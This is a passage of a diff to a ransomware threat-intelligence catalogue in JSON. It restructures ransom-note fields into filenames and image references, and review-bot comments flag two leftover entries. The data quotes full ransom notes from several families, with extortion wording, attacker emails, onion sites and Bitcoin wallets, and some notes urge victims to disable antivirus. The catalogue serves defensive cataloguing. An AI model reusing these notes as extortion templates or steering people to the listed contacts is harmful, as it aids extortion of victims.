antivirus support." 
], + "ransomnotes-filenames": [ + "HOW-TO-DECRYPT-FILES.txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/", "https://www.accenture.com/t20180803T064557Z__w__/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf" 
@@ -11465,9 +11667,11 @@ ], "payment-method": "Website Tor", "ransomnotes": [ - "HOW-TO-RECOVERY-FILES.TXT", "[Rose ASCII art]\n\n[WhiteRose written in ASCII art]\n\nThe singing of the sparrows, the breezes of the northern mountains and smell of the earth that was raining in the morning filled the entire garden space. I'm sitting on a wooden chair next to a bush tree, I have a readable book in my hands and I am sweating my spring with a cup of bitter coffee. Today is a different day.\n\nBehind me is an empty house of dreams and in front of me, full of beautiful white roses. To my left is an empty blue pool of red fish and my right, trees full of spring white blooms.\n\n I drink coffee, I'll continue to read a book from William Faulkner. In the garden environment, peace and quiet. My life always goes that way. Always alone without even an intimate friend.\n\nI have neither a pet, nor a friend or an enemy; I am a normal person with fantastic wishes among the hordes of white rose flowers. Everything is natural. I'm just a little interested in hacking and programming. My only electronic devices in this big garden are an old laptop for do projects and an iPhone for check out the news feeds for malware analytics on Twitter without likes posts.\n\nBelieve me, my only assets are the white roses of this garden. I think of days and write at night: the story, poem, code, exploit or the accumulation of the number of white roses sold and I say to myself that the wealth is having different friends of different races, languages, habits and religions, Not only being in a fairly stylish garden with full of original white roses.\n\nToday, I think deeply about the decision that has involved my mind for several weeks. A decision to freedom and at the worth of unity, intimacy, joy and love and is the decision to release white roses and to give gifts to all peoples of the world.\n\nI do not think about selling white roses again. 
This time, I will plant all the white roses of the garden to bring a different gift for the people of each country. No matter where is my garden and where I am from, no matter if you are a housekeeper or a big company owner, it does not matter if you are the west of the world or its east, it's important that the white roses are endless and infinite. You do not need to send letters or e-mails to get these roses. Just wait it tomorrow. Wait for good days with White Rose.\n\nI hope you accept this gift from me and if it reaches you, close your eyes and place yourself in a large garden on a wooden chair and feel this beautiful scene to reduce your anxiety and everyday tension.\n\nThank you for trusting me. Now open your eyes. Your system has a flower like a small garden; A white rose flower.\n\n/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n\n[Recovery Instructions]\n\n I. Download qTox on your computer from [https://tox.chat/download.html]\nII. Create new profile then enter our ID in search contacts\n Our Tox ID: \"6F548F217897AA4140FB4C514C8187F2FFDBA3CAFC83795DEE2FBCA369E689006B7CED4A18E9\". III. Wait for us to accept your request.\nIV. Copy '[PersonalKey]' in \"HOW-TO-RECOVERY-FILES.TXT\" file and send this key with one encrypted file less size then 2MB for trust us in our Tox chat.\n IV.I. Only if you did not receive a reply after 24 hours from us, send your message to our secure tor email address \"TheWhiteRose@Torbox3uiot6wchz.onion\".\n IV.II. For perform \"Step IV.I\" and enter the TOR network, you must download tor and register in \"http://torbox3uiot6wchz.onion\" Mail Service)\nV. We decrypt your two files and we will send you.\nVI. After ensuring the integrity of the files, We will send you payment info.\nVII. 
Now after payment, you get \"WhiteRose Decryptor\" Along with the private key of your system.\nVIII.Everything returns to the normal and your files will be released.\n\n/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n\nWhat is encryption?\n\n In cryptography, encryption is the process of encoding a message or information in such a way that only authorized parties can access it, and those who are not authorized cannot. Encryption does not itself prevent interference, but denies the intelligible content to a would-be interceptor. In an encryption scheme, the intended information or message, referred to as plaintext, is encrypted using an encryption algorithm – a cipher – generating ciphertext that can be read only if decrypted. For technical reasons, an encryption scheme usually uses a pseudo-random encryption key generated by an algorithm. It is in principle possible to decrypt the message without possessing the key, but, for a well-designed encryption scheme, considerable computational resources and skills are required. An authorized recipient can easily decrypt the message with the key provided by the originator to recipients but not to unauthorized users. in your case “WhiteRose Decryptor” software for safe and complete decryption of all your files and data.\n\nAny other way?\n\nIf you look through this text in the Internet and realise that something is wrong with your files but you do not have any instructions to restore your files, please contact your antivirus support." ], + "ransomnotes-filenames": [ + "HOW-TO-RECOVERY-FILES.TXT" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/the-whiterose-ransomware-is-decryptable-and-tells-a-strange-story/", "http://id-ransomware.blogspot.com/2018/03/whiterose-ransomware.html" 
@@ -11484,7 +11688,7 @@
 ],
 "payment-method": "Game",
 "price": "Play to decrypt",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/ransomware/p/pubg-ransomware/pubg-ransomware.jpg"
 ],
 "refs": [
@@ -11503,8 +11707,10 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.5 - 1",
- "ransomnotes": [
- "How To Decode Files.hta",
+ "ransomnotes-filenames": [
+ "How To Decode Files.hta"
+ ],
+ "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlsLwUjXsAA0xyY[1].jpg"
 ],
 "refs": [
@@ -11528,9 +11734,11 @@ "payment-method": "Bitcoin", "price": "0.2", "ransomnotes": [ - "READ_ME_FOR_DECRYPT_[id].txt", " ALL Y0UR D0CUMENTS, PHOTOS, DATABASES AND OTHER IMP0RTANT FILES HAVE BEEN ENCRYPTED!\n ====================================================================================================\n Your files are NOT damaged! Your files are modified only. This modification is reversible.\n\n The only 1 way to decrypt your files is to receive the private key and decryption program.\n\n Any attempts to restore your files with the third-party software will be fatal for your files!\n ====================================================================================================\n To receive the private key and decryption program follow the instructions below:\n\n 1. Download \"Tor Browser\" from https://www.torproject.org/ and install it.\n\n 2. In the \"Tor Browser\" open your personal page here:\n\n\n http://[victim_id].ofotqrmsrdc6c3rz.onion/EP866p5M93wDS513\n\n\n Note! This page is available via \"Tor Browser\" only.\n ====================================================================================================\n Also you can use temporary addresses on your personal page without using \"Tor Browser\":\n\n\n http://[victim_id].bankme.date/EP866p5M93wDS513\n\n http://[victim_id].jobsnot.services/EP866p5M93wDS513\n\n http://[victim_id].carefit.agency/EP866p5M93wDS513\n\n http://[victim_id].hotdisk.world/EP866p5M93wDS513\n\n\n Note! These are temporary addresses! They will be available for a limited amount of time!" ], + "ransomnotes-filenames": [ + "READ_ME_FOR_DECRYPT_[id].txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/decrypters-for-some-versions-of-magniber-ransomware-released/", "https://www.bleepingcomputer.com/news/security/goodbye-cerber-hello-magniber-ransomware/", 
@@ -11549,9 +11757,11 @@
 "payment-method": "Bitcoin",
 "price": "10 000 $",
 "ransomnotes": [
- "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/april/6/vurten.jpg",
 "UNCRYPT.README"
 ],
+ "ransomnotes-refs": [
+ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/april/6/vurten.jpg"
+ ],
 "refs": [
 "https://twitter.com/siri_urz/status/981191281195044867",
 "http://id-ransomware.blogspot.com/2018/04/vurten-ransomware.html"
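Review bot: `"UNCRYPT.README"` is left as the sole element of `"ransomnotes"` after the image URL moves to `"ransomnotes-refs"`, but it reads as a note filename rather than note text, which the other hunks in this series place under `"ransomnotes-filenames"`. If that is what it is, the entry should become `"ransomnotes-filenames": [ "UNCRYPT.README" ],` and the emptied `"ransomnotes"` array should be dropped rather than left as `[]`, so the same key does not hold note text in one entry and an empty list in another. The enclosing cluster entry starts before the hunk.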
@@ -11592,9 +11802,11 @@ ".FUCK" ], "ransomnotes": [ - "https://pastebin.com/xkRaRytW", "What Happened to My Computer?\nYour important files are encrypted.\nMany of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.\n\nCan I Recover My Files?\nSure. We guarantee that you can recover all your files safely and easily. But you have not so enough time.\nBut if you want to decrypt all your files, you need to pay.\n\nHow Do I Pay?\nPayment is accepted in Bitcoin only.\nPlease check the current price of Bitcoin and buy some bitcoins.\nAnd send the correct amount to the address specified in this window.\n\nWe strongly recommend you to not remove this software, and disable your anti-virus for a while, until you pay and the payment gets processed. If your anti-virus gets updated and removes this software automatically, it will not be able to recover your files even if you pay!\nOnce the payment is sent, send us an e-mail to the specified address specifying your \"Client ID\", you will be sent your decryption key in return.\nHow to buy Bitcoins?\n\nStep 1 : Create a portfolio on the Blockchain website at the address : https://blockchain.info/fr/wallet/#/signup\nStep 2 : Sign in to your account you just created and purchase the amount shown : https://blockchain.info/wallet/#/buy-sell\n Step 3 : Send the amount to the indicated Bitcoin address, once this is done send us an email with your \"Client ID\" you can retreive this in the file \"instruction.txt\" or \"Whats Appens With My File.s.txt\" in order to ask us the key of decryption of your data.\n\nContact us at : spaghetih@protonmail.com\nSend 20$ to Bitcoin at 1MFA4PEuDoe2UCKgabrwm8P4KztASKtiuv if you want decrypt your files !\nYour Client ID is : [id]" ], + "ransomnotes-refs": [ + 
"https://pastebin.com/xkRaRytW" + ], "refs": [ "https://twitter.com/demonslay335/status/981270787905720320" ] @@ -11693,16 +11905,18 @@ ], "payment-method": "Bitcoin", "price": "1 200 yuan (180,81 $)", - "ransomnotes": [ - "https://pbs.twimg.com/media/DNIoIFuX4AAce7J.jpg", - "https://pbs.twimg.com/media/DNx5Of-X0AASVda.jpg", + "ransomnotes-filenames": [ "_@XiaoBa@_.bmp", "_@Explanation@_.hta", "_XiaoBa_Info_.hta", "_XiaoBa_Info_.bmp", - "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/De8WvF_X0AARtYr[1].jpg", "# # DECRYPT MY FILE # #.bmp" ], + "ransomnotes-refs": [ + "https://pbs.twimg.com/media/DNIoIFuX4AAce7J.jpg", + "https://pbs.twimg.com/media/DNx5Of-X0AASVda.jpg", + "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/De8WvF_X0AARtYr[1].jpg" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/xiaoba-ransomware-retooled-as-coinminer-but-manages-to-ruin-your-files-anyway/", "https://twitter.com/malwrhunterteam/status/923847744137154560", 
@@ -11727,7 +11941,9 @@
 "payment-method": "Bitcoin",
 "price": "7000 $",
 "ransomnotes": [
- "Encrypted files! All your files are encrypted. Using AES256-bit encryption and RSA-2048-bit encryption. Making it impossible to recover files without the correct private key. If you are interested in getting is the key and recover your files You should proceed with the following steps. The only way to decrypt your files safely is to buy the Descrypt and Private Key software. Any attempts to restore your files with the third-party software will be fatal for your files! Important use Firefox or Chrome browser To proceed with the purchase you must access one of the link below https://lylh3uqyzay3lhrd.onion.to/ https://lylh3uqyzay3lhrd.onion.link/ If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser...",
+ "Encrypted files! All your files are encrypted. Using AES256-bit encryption and RSA-2048-bit encryption. Making it impossible to recover files without the correct private key. If you are interested in getting is the key and recover your files You should proceed with the following steps. The only way to decrypt your files safely is to buy the Descrypt and Private Key software. Any attempts to restore your files with the third-party software will be fatal for your files! Important use Firefox or Chrome browser To proceed with the purchase you must access one of the link below https://lylh3uqyzay3lhrd.onion.to/ https://lylh3uqyzay3lhrd.onion.link/ If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser..."
+ ],
+ "ransomnotes-refs": [
 "https://sensorstechforum.com/wp-content/uploads/2018/04/stf-NMCRYPT-ransomware-virus-ransom-note-tor-onion-network-page-768x827.png"
 ],
 "refs": [
@@ -11744,9 +11960,11 @@
 "payment-method": "Bitcoin",
 "price": "0.2",
 "ransomnotes": [
- "!HELP_YOUR_FILES.HTML",
 "We’re very sorry that all of your personal files have been encrypted :( But there are good news – they aren’t gone, you still have the opportunity to restore them! Statistically, the lifespan of a hard-drive is anywhere from 3 to 5 years. If you don’t make copies of important information, you could lose everything! Just imagine! In order to receive the program that will decrypt all of your files, you will need to pay a certain amount. But let’s start with something else…"
 ],
+ "ransomnotes-filenames": [
+ "!HELP_YOUR_FILES.HTML"
+ ],
 "refs": [
 "https://bartblaze.blogspot.lu/2018/04/maktub-ransomware-possibly-rebranded-as.html",
 "http://id-ransomware.blogspot.com/2018/04/ironlocker-ransomware.html"
@@ -11762,7 +11980,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.007305 - 0.05",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://pbs.twimg.com/media/DavxIr-W4AEq3Ny.jpg"
 ],
 "refs": [
@@ -11781,8 +11999,10 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.14",
- "ransomnotes": [
- "HOW DECRIPT FILES.hta",
+ "ransomnotes-filenames": [
+ "HOW DECRIPT FILES.hta"
+ ],
+ "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/ransomware/c/compiled-ransomware/ransom-note.jpg"
 ],
 "refs": [
@@ -11819,7 +12039,9 @@ "price": "2500 $", "ransomnotes": [ "SIGRUN 1.0 RANSOMWARE\n\nAll your important files are encrypted\n\nYour files has been encrypted by sigrun ransomware with unique decryption key.\n\nThere is only one way to get your files back: contact with us, pay, and get decryptor software. \n\nWe accept Bitcoin and Dash, you can find exchangers on https://www.bitcoin.com/buy-bitcoin and https://www.dash.org/exchanges/ and others.\n\nYou have unique idkey (in a yellow frame), write it in letter when contact with us.\n\nAlso you can decrypt 3 files for test, its guarantee what we can decrypt your files.\n\nIDKEY:\n>>> [id_key] <<<\nContact information:\n\nemail: sigrun_decryptor@protonmail.ch", - "~~~~~~SIGRUN 1.0 RANSOMWARE~~~~~~~~~\n\nAttention! \n\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .sigrun\n\nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files. \n\nBut don't worry! You still can restore it!\n\nIn order to restore it you need to contact with us via e-mail.\n\n-----------------------------------------------\n|Our e-mail is: sigrun_decryptor@protonmail.ch|\n-----------------------------------------------\n\nAs a proof we will decrypt 3 files for free!\n\nPlease, attach this to your message:\n[id_key]", + "~~~~~~SIGRUN 1.0 RANSOMWARE~~~~~~~~~\n\nAttention! \n\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .sigrun\n\nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files. \n\nBut don't worry! 
You still can restore it!\n\nIn order to restore it you need to contact with us via e-mail.\n\n-----------------------------------------------\n|Our e-mail is: sigrun_decryptor@protonmail.ch|\n-----------------------------------------------\n\nAs a proof we will decrypt 3 files for free!\n\nPlease, attach this to your message:\n[id_key]" + ], + "ransomnotes-filenames": [ "RESTORE-SIGRUN.html", "RESTORE-SIGRUN.txt" ], @@ -11838,7 +12060,7 @@ ".crybrazil" ], "payment-method": "Website", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/crybrazil.jpg" ], "refs": [ @@ -11855,7 +12077,7 @@ "meta": { "payment-method": "Bitcoin", "price": "0.0065 (50 $)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/De00yEDVQAE_p9z[1].jpg" ], "refs": [ @@ -11873,8 +12095,10 @@ ".DiskDoctor" ], "payment-method": "Bitcoin Email", - "ransomnotes": [ - "HOW TO RECOVER ENCRYPTED FILES.TXT", + "ransomnotes-filenames": [ + "HOW TO RECOVER ENCRYPTED FILES.TXT" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/De2sj4GW0AAuQer[1].jpg" ], "refs": [ @@ -11896,7 +12120,7 @@ ], "payment-method": "Bitcoin", "price": "0.1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/DfCO0T2WsAQvclJ[1].jpg" ], "refs": [ 
@@ -11922,15 +12146,19 @@ "payment-method": "Bitcoin", "price": "100 - 500", "ransomnotes": [ - "#RECOVERY-PC#.txt", "==========================# aurora ransomware #==========================\n\nSORRY! Your files are encrypted.\nFile contents are encrypted with random key.\nWe STRONGLY RECOMMEND you NOT to use any \"decryption tools\".\nThese tools can damage your data, making recover IMPOSSIBLE.\nAlso we recommend you not to contact data recovery companies.\nThey will just contact us, buy the key and sell it to you at a higher price.\nIf you want to decrypt your files, you have to get RSA private key.\nIn order to get private key, write here:\nbig.fish@vfemail.net\nAnd send me your id, your id:\n[redacted]\nAnd pay 200$ on 1GSbmCoKzkHVkSUxqdSH5t8SxJQVnQCeYf wallet\nIf someone else offers you files restoring, ask him for test decryption.\n Only we can successfully decrypt your files; knowing this can protect you from fraud.\nYou will receive instructions of what to do next.\n==========================# aurora ransomware #==========================", - "!-GET_MY_FILES-!.txt", - "@_RESTORE-FILES_@.txt", "%UserProfile%wall.i", - "https://www.bleepstatic.com/images/news/ransomware/a/aurora/ransom-note.jpg", - "https://www.bleepstatic.com/images/news/ransomware/a/aurora/wallpaper.jpg", "==========================# zorro ransomware #==========================\nSORRY! Your files are encrypted.\nFile contents are encrypted with random key.\nRandom key is encrypted with RSA public key (2048 bit)\n.We STRONGLY RECOMMEND you NOT to use any \"decryption tools\".\nThese tools can damage your data, making recover IMPOSSIBLE.\nAlso we recommend you not to contact data recovery companies.\nThey will just contact us, buy the key and sell it to you at a higher price.\nIf you want to decrypt your files, you need to get the RSA-key from us.\n--\nTo obtain an RSA-key, follow these steps in order:\n1. pay this sum 500$ to this BTC-purse: 18sj1xr86c3YHK44Mj2AXAycEsT2QLUFac\n2. 
write on the e-mail ochennado@tutanota.com or anastacialove21@mail.com indicating in the letter this ID-[id] and BTC-purse, from which paid.\nIn the reply letter you will receive an RSA-key and instructions on what to do next.\nWe guarantee you the recovery of files, if you do it right.\n==========================# zorro ransomware #==========================" ], + "ransomnotes-filenames": [ + "#RECOVERY-PC#.txt", + "!-GET_MY_FILES-!.txt", + "@_RESTORE-FILES_@.txt" + ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/ransomware/a/aurora/ransom-note.jpg", + "https://www.bleepstatic.com/images/news/ransomware/a/aurora/wallpaper.jpg" + ], "refs": [ "https://www.spamfighter.com/News-21588-Aurora-Ransomware-Circulating-the-Cyber-Space.htm", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/", @@ -11952,7 +12180,7 @@ ], "payment-method": "Bitcoin", "price": "500 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/pgpsnippet-variant.jpg", "http://id-ransomware.blogspot.com/2018/05/pgpsnippet-ransomware.html" ], @@ -11985,7 +12213,7 @@ ], "payment-method": "Bitcoin", "price": "100 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/15/DfQI_lnXUAAukGK[1].jpg" ], "refs": [ @@ -12018,7 +12246,7 @@ "_V.0.0.0.1{paradise@all-ransomware.info}.prt" ], "payment-method": "Bitcoin Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "PARADISE_README_paradise@all-ransomware.info.txt" ], "refs": [ 
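Review bot: `"%UserProfile%wall.i"` stays inside `"ransomnotes"` between the aurora and zorro note texts, although it looks like a dropped-file path (presumably the wallpaper) rather than note text, while the three `.txt` names around it were moved to `"ransomnotes-filenames"`. If it is a file reference, move it with them, e.g. `"ransomnotes-filenames": [ "#RECOVERY-PC#.txt", "!-GET_MY_FILES-!.txt", "@_RESTORE-FILES_@.txt", "%UserProfile%wall.i" ],`; if it is intentionally kept as note content, a short mention of what it is in the entry's `"description"` would stop the next editor from moving it. The Aurora entry begins before the hunk.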
@@ -12041,10 +12269,12 @@ "price": "0.1 - 0.3", "ransomnotes": [ "Your files were encrypted with AES-256.\n\nAsk how to restore your files by email reycarnasi1983@protonmail.com\n\nUse only gmail.com, yahoo.com, protonmail.com.\nMessages written from other mail services we can not get.\n\nWe always respond to messages. If there is no answer within 24 hours, then write us with another email service.\n\n[OR]\n\nIf within 24 hours you have not received a response, you need to follow the following instructions:\n\na) Download and install TOR browser: https://www.torproject.org/download/download-easy.html.en\nb) From the TOR browser, follow the link: torbox3uiot6wchz.onion\nc) Register your e-mail (Sign Up)\nd) Write us on e-mail: reycarnasi1983@torbox3uiot6wchz.onion\nATTENTION: e-mail (reycarnasi1983@torbox3uiot6wchz.onion) accepts emails, only with e-mail registered in the TOR browser at torbox3uiot6wchz.onion\n\n################################\n\nAny actions on your part over encrypted files can damage them. Be sure to make backups!\n\n################################\n\nIn the message write us this ID:\n[redacted base64]-----END KEY-----", - "ScrewYou.txt", - "Readme.txt", "Your files were encrypted with AES-256.\n\nAsk how to restore your files by email ssananunak1987@protonmail.com\n\nUse only gmail.com, yahoo.com, protonmail.com.\nMessages written from other mail services we can not get.\n\nWe always respond to messages. 
If there is no answer within 24 hours, then write us with another email service.\n\n[OR]\n\nIf within 24 hours you have not received a response, you need to follow the following instructions:\n\na) Download and install TOR browser: https://www.torproject.org/download/download-easy.html.en\nb) From the TOR browser, follow the link: torbox3uiot6wchz.onion\nc) Register your e-mail (Sign Up)\nd) Write us on e-mail: ssananunak1987@torbox3uiot6wchz.onion\nATTENTION: e-mail (ssananunak1987@torbox3uiot6wchz.onion) accepts emails, only with e-mail registered in the TOR browser at torbox3uiot6wchz.onion\n\n################################\n\nAny actions on your part over encrypted files can damage them. Be sure to make backups!\n\n################################\n\nIn the message write us this ID:\n[redacted base64]" ], + "ransomnotes-filenames": [ + "ScrewYou.txt", + "Readme.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1006220895302705154", "https://id-ransomware.blogspot.com/2018/03/b2dr-ransomware.html" 
@@ -12061,9 +12291,11 @@ ], "payment-method": "Email Tor", "ransomnotes": [ - "Readme.txt", "Hello. Your files have been encrypted.\n\nFor help, write to this e-mail: codyprince92@mail.com\nAttach to the letter 1-2 files (no more than 3 MB) and your personal key.\n\n\nIf within 24 hours you have not received a response, you need to follow the following instructions:\n\n\na) Download and install TOR browser: https://www.torproject.org/download/download-easy.html.en\nb) From the TOR browser, follow the link: torbox3uiot6wchz.onion\nc) Register your e-mail (Sign Up)\nd) Write us on e-mail: codyprince@torbox3uiot6wchz.onion\n\n\nATTENTION: e-mail (codyprince@torbox3uiot6wchz.onion) accepts emails, only with e-mail registered in the TOR browser at torbox3uiot6wchz.onion\n\n\n\nYour personal key:\n\n[redacted hex]" ], + "ransomnotes-filenames": [ + "Readme.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1006237353474756610", "http://id-ransomware.blogspot.com/2017/05/yyto-ransomware.html" @@ -12079,9 +12311,11 @@ ], "payment-method": "Email", "ransomnotes": [ - "Notice.txt", "Your files was encrypted using AES-256 algorithm. Write me to e-mail: qnbqwqe@protonmail.com to get your decryption key.\nYour USERKEY: [redacted 1024 bytes in base64]" ], + "ransomnotes-filenames": [ + "Notice.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1007334654918250496" ] @@ -12099,7 +12333,7 @@ ], "payment-method": "Bitcoin", "price": "3003 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsoIB_0U0AAXgEz[1].jpg" ], "refs": [ 
@@ -12140,8 +12374,12 @@ "payment-method": "Bitcoin", "price": "1", "ransomnotes": [ - "_How_to_decrypt_files.txt", - "Some files have been encrypted\nPlease send ( 1 ) bitcoins to my wallet address\nIf you paid, send the machine code to my email\nI will give you the key\nIf there is no payment within three days,\nwe will no longer support decryption\nIf you exceed the payment time, your data will be open to the public download\nWe support decrypting the test file.\nSend three small than 3 MB files to the email address\n\nBTC Wallet : [redacted]\nEmail: dbger@protonmail.com\nYour HardwareID:", + "Some files have been encrypted\nPlease send ( 1 ) bitcoins to my wallet address\nIf you paid, send the machine code to my email\nI will give you the key\nIf there is no payment within three days,\nwe will no longer support decryption\nIf you exceed the payment time, your data will be open to the public download\nWe support decrypting the test file.\nSend three small than 3 MB files to the email address\n\nBTC Wallet : [redacted]\nEmail: dbger@protonmail.com\nYour HardwareID:" + ], + "ransomnotes-filenames": [ + "_How_to_decrypt_files.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/u/986406/Ransomware/DBGer/DBGer-ransom-note.png" ], "refs": [ 
@@ -12214,9 +12452,11 @@ "payment-method": "Bitcoin", "price": "300 $", "ransomnotes": [ - "!!!KEYPASS_DECRYPTION_INFO!!!.txt", "Attention!\n\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KEYPASS\n\nThe only method of recovering files is to purchase an decrypt software and unique private key.\n\nAfter purchase you will start decrypt software, enter your unique private key and it will decrypt all your data.\n\nOnly we can give you this key and only we can recover your files.\n\nYou need to contact us by e-mail keypass@bitmessage.ch send us your personal ID and wait for further instructions.\n\nFor you to be sure, that we can decrypt your files - you can send us a 1-3 any not very big encrypted files and we will send you back it in a original form FREE.\n\nPrice for decryption $300.\n\nThis price avaliable if you contact us first 72 hours.\n\nE-mail address to contact us:\n\nkeypass@bitmessage.ch\n\n\n\nReserve e-mail address to contact us:\n\nkeypass@india.com\n\n\n\nYour personal id:\n[id]" ], + "ransomnotes-filenames": [ + "!!!KEYPASS_DECRYPTION_INFO!!!.txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/new-keypass-ransomware-campaign-underway/", "https://www.kaspersky.com/blog/keypass-ransomware/23447/" @@ -12238,9 +12478,11 @@ ], "payment-method": "Bitcoin", "price": "200 - 600 $", - "ransomnotes": [ + "ransomnotes-filenames": [ + "!readme.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsW33OQXgAAwJzv[1].jpg", - "!readme.txt", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsobVENXcAAR3GC[1].jpg" ], "refs": [ 
@@ -12258,9 +12500,11 @@ "meta": { "payment-method": "Bitcoin", "ransomnotes": [ - "https://www.bleepstatic.com/images/news/ransomware/b/barack-obama-ransomware/barack-obama-everlasting-blue-blackmail-virus.jpg", "Hello, your computer is encrypted by me! Yeah, that means your EXE file isn't open! Because I encrypted it.\nSo you can decrypt it, but you have to tip it. This is a big thing. You can email this email: 2200287831@qq.com gets more information." ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/ransomware/b/barack-obama-ransomware/barack-obama-everlasting-blue-blackmail-virus.jpg" + ], "refs": [ "https://twitter.com/malwrhunterteam/status/1032242391665790981", "https://www.bleepingcomputer.com/news/security/barack-obamas-blackmail-virus-ransomware-only-encrypts-exe-files/", @@ -12282,8 +12526,10 @@ ], "payment-method": "Bitcoin", "price": "200 $", - "ransomnotes": [ - "CRYPTONAR RECOVERY INFORMATION.txt", + "ransomnotes-filenames": [ + "CRYPTONAR RECOVERY INFORMATION.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/ransom-note.jpg" ], "refs": [ 
@@ -12340,8 +12586,12 @@ "payment-method": "Bitcoin", "price": "0.5", "ransomnotes": [ - "IMPORTANT ABOUT DECRYPT.txt", - "L!W2Be%BS4\nWARNING!! YOU ARE SO F*UCKED!!!\n\nYour Files Has Encrypted\n\nWhat happened to your files?\nAll of your files were protected by a strong encryptation\nThere is no way to decrypt your files without the key.\nIf your files not important for you just reinstall your system.\nx§If your files is important just email us to discuss the the price and how to decrypt your files.\n\nYou can email us to omg-help-me@openmailbox.org\n\nWe accept just BITCOIN if you don´t know what it is just google it.\nWe will give instructions where and how you buy bitcoin in your country.\nPrice depends on how important your files and network is.\nIt could be 0.5 bitcoin to 25 bitcoin.\nYou can send us a encrypted file for decryption.\nFell free to email us with your country, computer name and username of the infected system.", + "L!W2Be%BS4\nWARNING!! YOU ARE SO F*UCKED!!!\n\nYour Files Has Encrypted\n\nWhat happened to your files?\nAll of your files were protected by a strong encryptation\nThere is no way to decrypt your files without the key.\nIf your files not important for you just reinstall your system.\nx§If your files is important just email us to discuss the the price and how to decrypt your files.\n\nYou can email us to omg-help-me@openmailbox.org\n\nWe accept just BITCOIN if you don´t know what it is just google it.\nWe will give instructions where and how you buy bitcoin in your country.\nPrice depends on how important your files and network is.\nIt could be 0.5 bitcoin to 25 bitcoin.\nYou can send us a encrypted file for decryption.\nFell free to email us with your country, computer name and username of the infected system." + ], + "ransomnotes-filenames": [ + "IMPORTANT ABOUT DECRYPT.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlpDe-kXsAA2lmH[1].jpg" ], "refs": [ 
@@ -12358,7 +12608,7 @@
 "meta": {
 "payment-method": "Bitcoin",
 "price": "80 $",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dlq8W3FXoAAYR1v[1].jpg"
 ],
 "refs": [
@@ -12380,7 +12630,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "100 - 500 $",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlraMbTWwAA_367[1].jpg"
 ],
 "refs": [
@@ -12399,10 +12649,12 @@
 ],
 "payment-method": "Bitcoin",
 "price": "100 $",
- "ransomnotes": [
- "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dl2M9kdX0AAcGbJ[1].jpg",
+ "ransomnotes-filenames": [
 "README.txt"
 ],
+ "ransomnotes-refs": [
+ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dl2M9kdX0AAcGbJ[1].jpg"
+ ],
 "refs": [
 "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/",
 "https://twitter.com/siri_urz/status/1035138577934557184"
@@ -12419,11 +12671,13 @@
 "meta": {
 "payment-method": "Bitcoin",
 "price": "400 $",
